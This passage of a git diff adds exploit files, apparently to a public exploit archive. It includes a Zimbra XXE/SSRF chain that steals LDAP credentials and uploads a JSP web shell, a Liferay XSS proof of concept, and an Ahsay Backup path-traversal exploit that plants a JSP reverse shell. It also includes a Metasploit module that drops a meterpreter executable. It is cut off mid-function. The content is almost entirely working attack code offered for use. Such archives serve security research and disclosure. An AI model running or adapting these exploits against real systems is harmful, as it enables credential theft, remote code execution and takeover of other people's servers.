+Content-Disposition: form-data; name="binary3FileUpload"; filename="\"><img src=x onerror=alert(\"ismailtasdelen\")> .json"
+Content-Type: application/json
+
+# HTTP Response :
+
+HTTP/1.1 200 
+Content-Length: 0
+Date: Thu, 09 May 2019 10:23:44 GMT
+Connection: close
\ No newline at end of file
diff --git a/exploits/jsp/webapps/46967.py b/exploits/jsp/webapps/46967.py
new file mode 100755
index 000000000..7ed085ce6
--- /dev/null
+++ b/exploits/jsp/webapps/46967.py
@@ -0,0 +1,107 @@
+#coding=utf8
+import requests
+import sys
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+base_url=sys.argv[1]
+base_url=base_url.rstrip("/")
+#upload file name and content
+#modify by k8gege
+#Connect "shell.jsp" using K8fly CmdShell
+#Because the CMD parameter is encrypted using Base64(bypass WAF)
+filename = "shell.jsp"
+fileContent = r'<%@page import="java.io.*"%><%@page import="sun.misc.BASE64Decoder"%><%try {String cmd = request.getParameter("tom");String path=application.getRealPath(request.getRequestURI());String dir="weblogic";if(cmd.equals("NzU1Ng")){out.print("[S]"+dir+"[E]");}byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);String xxcmd = new String(binary);Process child = Runtime.getRuntime().exec(xxcmd);InputStream in = child.getInputStream();out.print("->|");int c;while ((c = in.read()) != -1) {out.print((char)c);}in.close();out.print("|<-");try {child.waitFor();} catch (InterruptedException e) {e.printStackTrace();}} catch (IOException e) {System.err.println(e);}%>'
+print(base_url)
+#dtd file url
+dtd_url="https://k8gege.github.io/zimbra.dtd"
+"""
+<!ENTITY % file SYSTEM "file:../conf/localconfig.xml">
+<!ENTITY % start "<![CDATA[">
+<!ENTITY % end "]]>">
+<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">
+"""
+xxe_data = r"""<!DOCTYPE Autodiscover [
+        <!ENTITY % dtd SYSTEM "{dtd}">
+        %dtd;
+        %all;
+        ]>
+<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
+    <Request>
+        <EMailAddress>aaaaa</EMailAddress>
+        <AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>
+    </Request>
+</Autodiscover>""".format(dtd=dtd_url)
+
+#XXE stage
+headers = {
+    "Content-Type":"application/xml"
+}
+print("[*] Get User Name/Password By XXE ")
+r = requests.post(base_url+"/Autodiscover/Autodiscover.xml",data=xxe_data,headers=headers,verify=False,timeout=15)
+#print r.text
+if 'response schema not available' not in r.text:
+    print("have no xxe")
+    exit()
+
+#low_token Stage
+import re
+pattern_name = re.compile(r"<key name=(\"|")zimbra_user(\"|")>\n.*?<value>(.*?)<\/value>")
+pattern_password = re.compile(r"<key name=(\"|")zimbra_ldap_password(\"|")>\n.*?<value>(.*?)<\/value>")
+username = pattern_name.findall(r.text)[0][2]
+password = pattern_password.findall(r.text)[0][2]
+print(username)
+print(password)
+
+auth_body="""<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
+   <soap:Header>
+       <context xmlns="urn:zimbra">
+           <userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/>
+       </context>
+   </soap:Header>
+   <soap:Body>
+     <AuthRequest xmlns="{xmlns}">
+        <account by="adminName">{username}</account>
+        <password>{password}</password>
+     </AuthRequest>
+   </soap:Body>
+</soap:Envelope>
+"""
+print("[*] Get Low Privilege Auth Token")
+r=requests.post(base_url+"/service/soap",data=auth_body.format(xmlns="urn:zimbraAccount",username=username,password=password),verify=False)
+
+pattern_auth_token=re.compile(r"<authToken>(.*?)</authToken>")
+
+low_priv_token = pattern_auth_token.findall(r.text)[0]
+
+#print(low_priv_token)
+
+# SSRF+Get Admin_Token Stage
+
+headers["Cookie"]="ZM_ADMIN_AUTH_TOKEN="+low_priv_token+";"
+headers["Host"]="foo:7071"
+print("[*] Get Admin  Auth Token By SSRF")
+r = requests.post(base_url+"/service/proxy?target=https://127.0.0.1:7071/service/admin/soap",data=auth_body.format(xmlns="urn:zimbraAdmin",username=username,password=password),headers=headers,verify=False)
+
+admin_token =pattern_auth_token.findall(r.text)[0]
+#print("ADMIN_TOKEN:"+admin_token)
+
+f = {
+    'filename1':(None,"whocare",None),
+    'clientFile':(filename,fileContent,"text/plain"),
+    'requestId':(None,"12",None),
+}
+
+headers ={
+    "Cookie":"ZM_ADMIN_AUTH_TOKEN="+admin_token+";"
+}
+print("[*] Uploading file")
+r = requests.post(base_url+"/service/extension/clientUploader/upload",files=f,headers=headers,verify=False)
+#print(r.text)
+print("Shell: "+base_url+"/downloads/"+filename)
+#print("Connect \"shell.jsp\" using K8fly CmdShell\nBecause the CMD parameter is encrypted using Base64(bypass WAF)")
+print("[*] Request Result:")
+s = requests.session()
+r = s.get(base_url+"/downloads/"+filename,verify=False,headers=headers)
+#print(r.text)
+print("May need cookie:")
+print(headers['Cookie'])
\ No newline at end of file
diff --git a/exploits/jsp/webapps/46983.txt b/exploits/jsp/webapps/46983.txt
new file mode 100644
index 000000000..69d88235e
--- /dev/null
+++ b/exploits/jsp/webapps/46983.txt
@@ -0,0 +1,26 @@
+# Exploit Title: Liferay Portal < 7.1 CE GA4 / SimpleCaptcha API XSS
+# Date: 04/06/2019
+# Exploit Author: Valerio Brussani (@val_brux)
+# Website: www.valbrux.it
+# Vendor Homepage: https://www.liferay.com/
+# Software Link: https://www.liferay.com/it/downloads-community
+# Version: < 7.1 CE GA4
+# Tested on: Liferay Portal 7.1 CE GA3
+# CVE: CVE-2019-6588
+# Reference1: https://dev.liferay.com/web/community-security-team/known-vulnerabilities/liferay-portal-71/-/asset_publisher/7v4O7y85hZMo/content/cst-7130-multiple-xss-vulnerabilities-in-7-1-ce-ga3
+# Reference2: https://www.valbrux.it/blog/2019/06/04/cve-2019-6588-liferay-portal-7-1-ce-ga4-simplecaptcha-api-xss/
+
+
+Introduction
+In Liferay Portal before 7.1 CE GA4, an XSS vulnerability exists in the SimpleCaptcha API when custom code passes unsanitized input 
+into the “url” parameter of the JSP taglib call <liferay-ui:captcha url=”<%= url %>” /> or <liferay-captcha:captcha url=”<%= url %>” />. 
+A customized Liferay portlet which directly calls the Simple Captcha API without sanitizing the input could be susceptible to this vulnerability.
+ 
+Poc
+In a sample scenario of custom code calling the <liferay-ui:captcha url=”<%= url %>” /> JSP taglib, appending a payload like the following to the body parameters of a customized form:
+ 
+&xxxx%22%3e%3cscript%3ealert(1)</script> 
+ 
+The script is reflected in the src attribute of the <img> tag, responsible of fetching the next available captcha:
+ 
+<img alt=”xxx” class=”xxxx” src=”xxxxxx“><script>alert(1)</script>=” />
\ No newline at end of file
diff --git a/exploits/jsp/webapps/47179.py b/exploits/jsp/webapps/47179.py
new file mode 100755
index 000000000..4e9bd1186
--- /dev/null
+++ b/exploits/jsp/webapps/47179.py
@@ -0,0 +1,440 @@
+# Exploit Title: Authenticated insecure file upload and code execution flaw in Ahsay Backup v7.x - v8.1.1.50. (POC)
+# Date: 26-6-2019
+# Exploit Author: Wietse Boonstra
+# Vendor Homepage: https://ahsay.com
+# Software Link: http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe
+# Version: 7.x < 8.1.1.50
+# Tested on: Windows / Linux
+# CVE : CVE-2019-10267
+
+
+#!/usr/bin/env python3
+
+"""
+# Exploit Title: Authenticated insecure file upload and code execution flaw in Ahsay Backup v7.x - v8.1.1.50. 
+# Date: 26-6-2019
+# Exploit Author: Wietse Boonstra
+# Vendor Homepage: https://ahsay.com
+# Software Link: http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe
+# Version: 7.x < 8.1.1.50 
+# Tested on: Windows / Linux
+# CVE : CVE-2019-10267
+
+Session cookies are reflected in the JavaScript url: 
+
+"""
+
+import urllib3
+import argparse
+import base64
+import re
+import socket
+from urllib.parse import urlencode
+import gzip
+import json
+import hashlib
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+def b64(s):
+    try:
+        return base64.b64encode(bytes(s, 'utf-8')).decode('utf-8')
+    except:
+        return base64.b64encode(bytes("", 'utf-8')).decode('utf-8')
+     
+def md5Sum(buf):
+    hasher = hashlib.md5()
+    hasher.update(buf)
+    a = hasher.hexdigest()
+    return a
+
+class Exploit():
+    def __init__(self, url, username="", password="", proxy="" ):
+        self.url = url
+        self.username = username
+        self.password = password
+        self.accountValid = None
+        if proxy:
+            self.http = urllib3.ProxyManager(proxy)
+        else:
+            self.http = urllib3.PoolManager()
+        
+    def fileActions(self, path="../../../../../../", action='list', recurse=False):
+        """
+        actions: download, list, delete, (upload  different function use self.upload)
+        """
+        try:
+            if not self.checkAccount(self.username,self.password):
+                return False
+            if recurse:
+                recurse = "true"
+            else:
+                recurse = "false"
+            
+            headers={
+                'X-RSW-Request-1':	'{}'.format(b64(self.password)),
+                'X-RSW-Request-0':	'{}'.format(b64(self.username))
+            }
+            # http = urllib3.ProxyManager("https://localhost:8080")
+                
+            path = {
+                'X-RSW-custom-encode-path':'{}'.format(path),
+                'recursive':'{}'.format(recurse)
+                }
+            path = urlencode(path)
+            if action == "delete":
+                r = self.http.request('DELETE', '{}/obs/obm7/file/{}?{}'.format(url,action,path),'',headers)
+            else:
+                r = self.http.request('GET', '{}/obs/obm7/file/{}?{}'.format(url,action,path),'',headers)
+            if (r.status == 200):
+                if (action == 'list'):
+                    result = json.loads(gzip.decompress(r.data))
+                    dash = '-' * 50
+                    print(dash)
+                    print('{:<11}{:<16}{:<20}'.format("Type", "Size","Name"))
+                    print(dash)
+                    for item in result["children"]:
+                        print('{:<11}{:<16}{:<20}'.format(item['fsoType'], item['size'],item['name']))
+                    print(dash) 
+                else:
+                    if action == "delete":
+                        print ("File has been deleted")
+                    else:
+                        return (r.data.decode('utf-8'))
+            else:
+                print ("Something went wrong!")
+                print (r.data)
+                print (r.status)
+        except Exception as e:
+            print (e)
+            pass
+
+    def exploit(self, ip, port, uploadPath="../../webapps/cbs/help/en/", reverseShellFileName="test.jsp" ):
+        """
+        This function will setup the jsp reverse shell
+        """
+        if not self.checkAccount(self.username, self.password):
+            return False
+
+        reverseShell = '''<%@page import="java.lang.*"%>
+            <%@page import="java.util.*"%>
+            <%@page import="java.io.*"%>
+            <%@page import="java.net.*"%>
+
+            <%
+            class StreamConnector extends Thread
+            {{
+                InputStream az;
+                OutputStream jk;
+
+                StreamConnector( InputStream az, OutputStream jk )
+                {{
+                this.az = az;
+                this.jk = jk;
+                }}
+
+                public void run()
+                {{
+                BufferedReader vo  = null;
+                BufferedWriter ijb = null;
+                try
+                {{
+                    vo  = new BufferedReader( new InputStreamReader( this.az ) );
+                    ijb = new BufferedWriter( new OutputStreamWriter( this.jk ) );
+                    char buffer[] = new char[8192];
+                    int length;
+                    while( ( length = vo.read( buffer, 0, buffer.length ) ) > 0 )
+                    {{
+                    ijb.write( buffer, 0, length );
+                    ijb.flush();
+                    }}
+                }} catch( Exception e ){{}}
+                try
+                {{
+                    if( vo != null )
+                    vo.close();
+                    if( ijb != null )
+                    ijb.close();
+                }} catch( Exception e ){{}}
+                }}
+            }}
+
+            try
+            {{
+                String ShellPath;
+            if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {{
+            ShellPath = new String("/bin/sh");
+            }} else {{
+            ShellPath = new String("cmd.exe");
+            }}
+
+                Socket socket = new Socket( "{0}", {1} );
+                Process process = Runtime.getRuntime().exec( ShellPath );
+                ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
+                ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
+            }} catch( Exception e ) {{}}
+            %>'''.format(str(ip), str(port))
+
+        try:
+            if (uploadPath == "../../webapps/cbs/help/en/"):
+                callUrl = "{}/{}{}".format(self.url,re.sub("^../../webapps/",'',uploadPath),reverseShellFileName)
+            exploitUrl = "{}{}".format(uploadPath,reverseShellFileName)
+            print (exploitUrl)
+            self.upload(exploitUrl, reverseShell)
+            print ("Checking if file is uploaded.")
+            
+            if (md5Sum(self.fileActions(exploitUrl,'download').encode('utf-8')) == md5Sum(reverseShell.encode('utf-8'))):
+                print ("File content is the same, upload OK!")
+                print ("Triggering {}".format(callUrl))
+                # http = urllib3.ProxyManager("https://localhost:8080")
+                r = self.http.request('GET', '{}'.format(callUrl))
+                if r.status == 200:
+                    print ("Done, Check your netcat listener!")
+                return True
+            else: 
+                return False
+        except Exception as e:
+            print (e)
+            return False
+
+    def upload(self, filePath, fileContent ):
+        """
+        Needs a valid username and password.
+        Needs a filepath + filename to upload to. 
+        Needs the file content.
+        """
+
+        b64UploadPath = b64("{}".format(filePath))
+        try:
+            if not self.checkAccount(self.username, self.password):
+                return False
+            headers={
+                'X-RSW-Request-0':	'{}'.format(b64(self.username)),
+                'X-RSW-Request-1':	'{}'.format(b64(self.password)),
+                'X-RSW-custom-encode-path': '{}'.format(b64UploadPath)
+            }
+            # http = urllib3.ProxyManager("https://localhost:8080")
+            r = self.http.request(
+                'PUT', 
+                '{}/obs/obm7/file/upload'.format(self.url),
+                body=fileContent,
+                headers=headers)
+            if (r.status == 201):
+                print ("File {}".format(r.reason))
+            else:
+                print ("Something went wrong!")
+                print (r.data)
+                print (r.status)
+        except Exception as e:
+            print ("Something went wrong!")
+            print (e)
+            pass
+    
+    def checkAccount(self, username, password):
+        try:
+            headers={
+                'X-RSW-custom-encode-password':	'{}'.format(b64(password)),
+                'X-RSW-custom-encode-username':	'{}'.format(b64(username))
+            }
+            # http = urllib3.ProxyManager("https://localhost:8080")
+            r = self.http.request('POST', '{}/obs/obm7/user/getUserProfile'.format(url),'',headers)
+            if (r.data == b'CLIENT_TYPE_INCORRECT') or (r.status == 200):
+                if self.accountValid is None:
+                    print ("Account is valid with username: '{}' and password '{}'".format(username, password))
+                self.accountValid = True
+                return True
+            elif (r.data == b'USER_NOT_EXIST'):
+                if not self.accountValid is None:
+                    print ("Username does not exist!")
+                self.accountValid = False
+                return False
+            elif (r.data == b'PASSWORD_INCORRECT'):
+                if self.accountValid is None:
+                    print ("Password not correct but username '{}' is".format(username))
+                self.accountValid = False
+                return False
+            else:
+                if self.accountValid is None:
+                    print ("Something went wrong!")
+                self.accountValid = False
+                return False
+                # print (r.data)
+                # print (r.status)
+        except Exception as e:
+            print (e)
+            self.accountValid = False
+            return False
+            
+    def checkTrialAccount(self):
+        try:
+            # http = urllib3.ProxyManager("https://localhost:8080")
+            r = self.http.request('POST', '{}/obs/obm7/user/isTrialEnabled'.format(self.url),'','')
+            if (r.status == 200 and r.data == b'ENABLED' ):
+                print ("Server ({}) has Trial Account enabled, exploit should work!".format(self.url))
+                return True
+            else:
+                print ("Server ({}) has Trial Account disabled, please use a valid account!".format(self.url))
+                return False
+        except Exception as e:
+            print ("Something went wrong with url {} !".format(self.url))
+            print (e)
+            return False
+
+    def addTrialAccount(self,alias=""):
+        try:
+            if not self.checkTrialAccount():
+                return False
+            
+            headers={
+                'X-RSW-custom-encode-alias':	'{}'.format(b64(alias)), 
+                'X-RSW-custom-encode-password':	'{}'.format(b64(self.password)),
+                'X-RSW-custom-encode-username':	'{}'.format(b64(self.username))
+            }
+            # http = urllib3.ProxyManager("https://localhost:8080")
+            r = self.http.request('POST', '{}/obs/obm7/user/addTrialUser'.format(url),'',headers)
+            if (r.status == 200):
+                print ("Account '{}' created with password '{}'".format(username, password))
+            elif (r.data == b'LOGIN_NAME_IS_USED'):
+                print ("Username is in use!")
+            elif (r.data == b'PWD_COMPLEXITY_FAILURE'):
+                print ("Password not complex enough")
+            else:
+                print ("Something went wrong!")
+                print (r.data)
+                print (r.status)
+        except Exception as e:
+            print (e)
+            pass
+
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(
+        __file__,
+        description="Exploit for AhsayCBS v6.x < v8.1.1..50",
+        usage="""
+    Check if Trial account is enabled: %(prog)s --host https://172.16.238.213/ -c
+    Create Trial account: %(prog)s --host https://172.16.238.213/ -a -u test01 -p 'Welcome01!'
+    Create Trial account with stored XSS: %(prog)s --host https://172.16.238.213/ -a -u test01 -p 'Welcome01!' -x --xssvalue "'><script>alert(1)</script>"
+    Delete file: %(prog)s --host https://172.16.238.213/ -u test01 -p Welcome01! --action delete --path ../../../../../../../../test.txt
+    List files in dir: %(prog)s --host https://172.16.238.213/ -u test01 -p Welcome01! --action list --path ../../../../../../../../
+    Upload a file: %(prog)s --host https://172.16.238.213/ -u test01 -p Welcome01! --action upload --localfile test.txt --path ../../../../../../../../ --filename test.txt
+    Upload reverse shell: %(prog)s --host https://172.16.238.213/ -u test01 -p Welcome01! -e --ip 172.16.238.1 --port 4444
+        """
+        
+    )
+    manda = parser.add_argument_group("Mandatory options")
+    manda.add_argument("--host",
+        help="Url of AhsayCBS server",
+        # required=True
+    )
+    check = parser.add_argument_group("Check options")
+    check.add_argument("-c", "--check",
+        help="Check if host is vulnerable",
+        action="store_true"
+    )
+    
+    add = parser.add_argument_group("Add account options")
+    add.add_argument("-a","--add",
+        help="Add trial account",
+        action="store_true"
+    )
+    add.add_argument("-u","--username",
+        help="username to create"
+    )
+    add.add_argument("-p","--password",
+        help="Password to create"
+    )
+
+    exploit = parser.add_argument_group("Exploit options")
+    exploit.add_argument("-e", "--exploit",
+        help="Run reverse shell exploit",
+        action="store_true"
+    )
+    exploit.add_argument("--ip",
+        help="Set the attackers IP",
+        default="127.0.0.1"
+    )
+    exploit.add_argument("--port",
+        help="Set the attackers port",
+        default="4444"
+    )
+
+    #Optional
+    xss = parser.add_argument_group("XSS")
+    xss.add_argument("-x","--xss",
+        help="Use XSS in alias field.",
+        action="store_true",
+        default=False
+    )
+    xss.add_argument("--xssvalue",
+        help="Custom XSS value (must start with '>)",
+        default="'><script>alert(1)</script>",
+        required=False
+    )
+    
+
+    # list files
+    fileaction = parser.add_argument_group("File actions", "We can control the files on the server with 4 actions: list content of directory, download file (read), write file (upload) and delete file." )
+
+    fileaction.add_argument("--action",
+        help="use: delete, upload, download or list",
+        default="list"
+    )
+    fileaction.add_argument("--localfile",
+        help="Upload a local file"
+    )
+    fileaction.add_argument("--filename",
+        help="Filename on the server"
+    )
+    fileaction.add_argument("--path",
+        help="Directory on server use ../../../",
+        default="/"
+    )
+
+    fileaction.add_argument("--recursive",
+        help="Recurse actions list and delete",
+        action="store_true",
+        default=False
+    )
+
+    try:
+        args = parser.parse_args()
+        if args.add and (args.username is None or args.password is None):
+            parser.error("The option --add / -a requires: --username and --password")
+        if args.exploit and (args.username is None or args.password is None or args.ip is None or args.port is None):
+            parser.error("The option -e / --exploit requires: --username, --password, --ip and --port")
+        # if not (args.host or args.r7):
+        if not (args.host):
+            parser.error("The option --host requires: -a, -c, -e or -f")
+        else:
+            
+            url = args.host
+            url = url.rstrip('/')
+            username = args.username
+            password = args.password
+            e = Exploit(url,username,password,"http://localhost:8080")
+            if args.check:
+                e.checkTrialAccount()
+            elif args.add:
+                if args.xss and (args.xssvalue is None):
+                    parser.error("The option -x / --xss requires: --xssvalue")
+                if args.xssvalue:
+                    alias = args.xssvalue
+                e.addTrialAccount(alias)
+            elif args.exploit:
+                print ("Exploiting please start a netcat listener on {}:{}".format(args.ip,args.port))
+                input("Press Enter to continue...")
+                e.exploit(args.ip, args.port,"../../webapps/cbs/help/en/","SystemSettings_License_Redirector_AHSAY.jsp")
+            elif args.action != "upload":
+                e.fileActions(args.path,args.action,args.recursive)
+            elif args.action == "upload":
+                if args.localfile is not None:
+                    f = open(args.localfile, "r")
+                    fileContent = f.read()
+                    e.upload("{}{}".format(args.path,args.filename),fileContent)
+                else:
+                    parser.error("The option --upload must contain path to local file")
+            
+    except Exception as e:
+        print (e)
+        pass
\ No newline at end of file
diff --git a/exploits/jsp/webapps/47180.rb b/exploits/jsp/webapps/47180.rb
new file mode 100755
index 000000000..97ccd362d
--- /dev/null
+++ b/exploits/jsp/webapps/47180.rb
@@ -0,0 +1,401 @@
+# Exploit Title: Authenticated insecure file upload and code execution flaw in Ahsay Backup v7.x - v8.1.1.50. (Metasploit)
+# Date: 26-6-2019
+# Exploit Author: Wietse Boonstra
+# Vendor Homepage: https://ahsay.com
+# Software Link: http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe
+# Version: 7.x < 8.1.1.50 (REQUIRED)
+# Tested on: Windows / Linux
+# CVE : CVE-2019-10267
+ 
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+ 
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  include REXML
+ 
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Ahsay Backup v7.x-v8.1.1.50 (authenticated) file upload',
+      'Description' => %q{
+       This module exploits an authenticated insecure file upload and code
+       execution flaw in Ahsay Backup v7.x - v8.1.1.50. To succesfully execute
+       the upload credentials are needed, default on Ahsay Backup trial
+       accounts are enabled so an account can be created.
+ 
+       It can be exploited in Windows and Linux environments to get remote code
+       execution (usualy as SYSTEM). This module has been tested successfully
+       on Ahsay Backup v8.1.1.50 with Windows 2003 SP2 Server. Because of this
+       flaw all connected clients can be configured to execute a command before
+       the backup starts. Allowing an attacker to takeover even more systems
+       and make it rain shells!
+ 
+       Setting the CREATEACCOUNT to true will create a new account, this is
+       enabled by default.
+       If credeantials are known enter these and run the exploit.
+      },
+      'Author'       =>
+        [
+          'Wietse Boonstra'
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'CVE', '2019-10267'],
+          [ 'URL', 'https://www.wbsec.nl/ahsay/' ],
+          [ 'URL', 'http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe' ]
+        ],
+      'Privileged'  => true,
+      'Platform'    => 'win',
+      'DefaultOptions' => {
+        'RPORT' => 443,
+        'SSL' => true,
+        'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
+      },
+      'Targets'     =>
+        [
+          [  'Windows x86',
+            {
+              'Arch' => ARCH_X86,
+              'Platform' => 'win'
+            }
+          ],
+          [ 'Linux x86', # should work but untested
+            {
+              'Arch' => ARCH_X86,
+              'Platform' => 'linux'
+            },
+          ],
+ 
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jun 1 2019'))
+ 
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('TARGETURI', [true, 'Path to Ahsay', '/']),
+        OptString.new('USERNAME', [true, 'Username for the (new) account', Rex::Text.rand_text_alphanumeric(8)]),
+        OptString.new('PASSWORD', [true, 'Password for the (new) account', Rex::Text.rand_text_alpha(8) + Rex::Text.rand_text_numeric(5) + Rex::Text.rand_char("","!$%^&*")]),
+        OptString.new('CREATEACCOUNT', [false, 'Create Trial account', 'false']),
+        OptString.new('UPLOADPATH', [false, 'Payload Path', '../../webapps/cbs/help/en']),
+ 
+      ])
+  end
+ 
+  def is_trial_enabled?
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'obs','obm7','user','isTrialEnabled'),
+      'method' => 'POST',
+      'data'   => ''
+    })
+    if res and res.code == 200 and "ENABLED" =~ /#{res.body}/
+      return true
+    else
+      return false
+    end
+  end
+ 
+  def check_account?
+    headers = create_request_headers
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'obs','obm7','user','getUserProfile'),
+      'method' => 'POST',
+      'data'   => '',
+      'headers' => headers
+    })
+    if res and res.code == 200
+      print_good("Username and password are valid!")
+      return true
+    elsif res and res.code == 500 and "USER_NOT_EXIST" =~ /#{res.body}/
+      # fail_with(Failure::NoAccess, 'Username incorrect!')
+      print_status("Username does not exist.")
+      return false
+    elsif res and res.code == 500 and "PASSWORD_INCORRECT" =~ /#{res.body}/
+      # fail_with(Failure::NoAccess, 'Username exists but password incorrect!')
+      print_status("Username exists but password incorrect!")
+      return false
+    else
+      return false
+    end
+  end
+ 
+  def create_request_headers
+    headers = {}
+    username = Rex::Text.encode_base64(datastore['USERNAME'])
+    password = Rex::Text.encode_base64(datastore['PASSWORD'])
+    headers['X-RSW-custom-encode-username'] = username
+    headers['X-RSW-custom-encode-password'] = password
+    headers
+  end
+ 
+  def exploit
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+ 
+    if is_trial_enabled? and datastore['CREATEACCOUNT'] == "true"
+      if username == "" or password == ""
+        fail_with(Failure::NoAccess, 'Please set a username and password')
+      else
+        #check if account does not exists?
+        if !check_account?
+          # Create account and check if it is valid
+          if create_account?
+            drop_and_execute()
+          else
+            fail_with(Failure::NoAccess, 'Failed to authenticate')
+          end
+        else
+          #Need to fix, check if account exist
+          print_good("No need to create account, already exists!")
+          drop_and_execute()
+        end
+      end
+    elsif username != "" and password != ""
+      if check_account?
+        drop_and_execute()
+      else
+        if is_trial_enabled?
+          fail_with(Failure::NoAccess, 'Username and password are invalid. But server supports trial accounts, you can create an account!')
+        end
+        fail_with(Failure::NoAccess, 'Username and password are invalid')
+      end
+    else
+      fail_with(Failure::UnexpectedReply, 'Missing some settings')
+    end
+  end
+ 
+  def create_account?
+    headers = create_request_headers
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'obs','obm7','user','addTrialUser'),
+      'method' => 'POST',
+      'data'   => '',
+      'headers' => headers
+    })
+    # print (res.body)
+    if res and res.code == 200
+      print_good("Account created")
+      return true
+    elsif res.body.include?('LOGIN_NAME_IS_USED')
+      fail_with(Failure::NoAccess, 'Username is in use!')
+    elsif res.body.include?('PWD_COMPLEXITY_FAILURE')
+      fail_with(Failure::NoAccess, 'Password not complex enough')
+    else
+      fail_with(Failure::UnexpectedReply, 'Something went wrong!')
+    end
+  end
+ 
+  def remove_account
+    if datastore['CREATEACCOUNT']
+      username = datastore['USERNAME']
+      users_xml = "../../conf/users.xml"
+      print_status("Looking for account #{username} in #{users_xml}")
+      xml_doc = download(users_xml)
+      xmldoc = Document.new(xml_doc)
+      el = 0
+      xmldoc.elements.each("Setting/Key") do |e|
+          el = el + 1
+          e.elements.each("Value") do |a|
+              if a.attributes["name"].include?('name')
+                  if a.attributes["data"].include?(username)
+                      print_good("Found account")
+                      xmldoc.root.elements.delete el
+                      print_status("Removed account")
+                  end
+              end
+          end
+      end
+      new_xml = xmldoc.root
+      print_status("Uploading new #{users_xml} file")
+      upload(users_xml, new_xml.to_s)
+      print_good("Account is inaccesible when service restarts!")
+    end
+  end
+ 
+  def prepare_path(path)
+    if path.end_with? '/'
+      path = path.chomp('/')
+    end
+    path
+  end
+ 
+  def drop_and_execute()
+    path = prepare_path(datastore['UPLOADPATH'])
+    exploitpath = path.gsub("../../webapps/cbs/",'')
+    exploitpath = exploitpath.gsub("/","\\\\\\")
+    requestpath = path.gsub("../../webapps/",'')
+ 
+    #First stage payload creation and upload
+    exe = payload.encoded_exe
+    exe_filename = Rex::Text.rand_text_alpha(10)
+    exefileLocation = "#{path}/#{exe_filename}.exe"
+    print_status("Uploading first stage payload.")
+    upload(exefileLocation, exe)
+    #../../webapps/cbs/help/en
+    exec = %Q{<% Runtime.getRuntime().exec(getServletContext().getRealPath("/") + "#{exploitpath}\\\\#{exe_filename}.exe");%>}
+ 
+    #Second stage payload creation and upload
+    jsp_filename = Rex::Text.rand_text_alpha(10)
+    jspfileLocation = "#{path}/#{jsp_filename}.jsp"
+    print_status("Uploading second stage payload.")
+    upload(jspfileLocation, exec)
+    proto = ssl ? 'https' : 'http'
+    url = "#{proto}://#{datastore['RHOST']}:#{datastore['RPORT']}" + normalize_uri(target_uri.path, "#{requestpath}/#{jsp_filename}.jsp")
+ 
+    #Triggering the exploit
+    print_status("Triggering exploit! #{url}" )
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, "#{requestpath}/#{jsp_filename}.jsp"),
+      'method' => 'GET'
+    })
+    if res and res.code == 200
+      print_good("Exploit executed!")
+    end
+ 
+    #Cleaning up
+    print_status("Cleaning up after our selfs.")
+    remove_account
+    print_status("Trying to remove #{exefileLocation}, but will fail when in use.")
+    delete(exefileLocation)
+    delete(jspfileLocation)
+    delete("../../user/#{datastore['USERNAME']}",true)
+  end
+ 
+  def upload(fileLocation, content)
+    username = Rex::Text.encode_base64(datastore['USERNAME'])
+    password = Rex::Text.encode_base64(datastore['PASSWORD'])
+    uploadPath = Rex::Text.encode_base64(fileLocation)
+ 
+    headers = {}
+    headers['X-RSW-Request-0'] = username
+    headers['X-RSW-Request-1'] = password
+    headers['X-RSW-custom-encode-path'] = uploadPath
+    res = send_request_raw({
+      'uri' => normalize_uri(target_uri.path, 'obs','obm7','file','upload'),
+      'method' => 'PUT',
+      'headers' => headers,
+      'data' => content,
+      'timeout' => 20
+    })
+    if res && res.code == 201
+      print_good("Succesfully uploaded file to #{fileLocation}")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
+    end
+  end
+ 
+  def download(fileLocation)
+    #TODO make vars_get variable
+    print_status("Downloading file")
+    username = Rex::Text.encode_base64(datastore['USERNAME'])
+    password = Rex::Text.encode_base64(datastore['PASSWORD'])
+    headers = {}
+    headers['X-RSW-Request-0'] = username
+    headers['X-RSW-Request-1'] = password
+    res = send_request_cgi({
+      #/obs/obm7/file/download?X-RSW-custom-encode-path=../../conf/users.xml
+      'uri' => normalize_uri(target_uri.path, 'obs','obm7','file','download'),
+      'method' => 'GET',
+      'headers' => headers,
+      'vars_get' => {
+        'X-RSW-custom-encode-path' => fileLocation
+      }
+    })
+ 
+    if res and res.code == 200
+      res.body
+    end
+  end
+ 
+  def delete(fileLocation, recursive=false)
+    print_status("Deleting file #{fileLocation}")
+    username = Rex::Text.encode_base64(datastore['USERNAME'])
+    password = Rex::Text.encode_base64(datastore['PASSWORD'])
+    headers = {}
